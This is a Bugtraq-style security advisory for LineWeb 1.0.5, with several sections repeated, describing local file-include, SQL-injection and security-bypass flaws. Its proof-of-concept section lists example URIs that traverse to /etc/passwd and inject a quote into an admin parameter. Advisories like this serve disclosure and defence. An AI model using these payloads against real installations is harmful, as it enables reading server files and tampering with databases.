LineWeb 1.0.5 Multiple Remote Vulnerabilities
BID:37613
Info
LineWeb 1.0.5 Multiple Remote Vulnerabilities
| Bugtraq ID: | 37613 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 05 2010 12:00AM |
| Updated: | Jan 06 2010 06:02PM |
| Credit: | Ignacio Garrido |
| Vulnerable: |
L2Web LineWeb 1.0.5 |
| Not Vulnerable: | |
Discussion
LineWeb 1.0.5 Multiple Remote Vulnerabilities
LineWeb is prone to multiple remote vulnerabilities:
- Multiple local file-include vulnerabilities
- An SQL-injection vulnerability
- A security-bypass vulnerability
An attacker can exploit these issues to execute arbitrary local files within the context of the webserver process, obtain sensitive information, compromise the affected application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LineWeb 1.0.5 is vulnerable; other versions may also be affected.
LineWeb is prone to multiple remote vulnerabilities:
- Multiple local file-include vulnerabilities
- An SQL-injection vulnerability
- A security-bypass vulnerability
An attacker can exploit these issues to execute arbitrary local files within the context of the webserver process, obtain sensitive information, compromise the affected application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LineWeb 1.0.5 is vulnerable; other versions may also be affected.
Exploit / POC
LineWeb 1.0.5 Multiple Remote Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=index.php?op=../../../../../../../etc/passwd%00
http://www.example.com/Lineage ACM/lineweb_1.0.5/index.php?op=index.php?op=../../../../../../../etc/passwd%00
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=index.php?op=../../../../../../../etc/passwd%00
http://www.example.com/Lineage ACM/lineweb_1.0.5/index.php?op=index.php?op=../../../../../../../etc/passwd%00
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27
Solution / Fix
LineWeb 1.0.5 Multiple Remote Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
LineWeb 1.0.5 Multiple Remote Vulnerabilities
References:
References: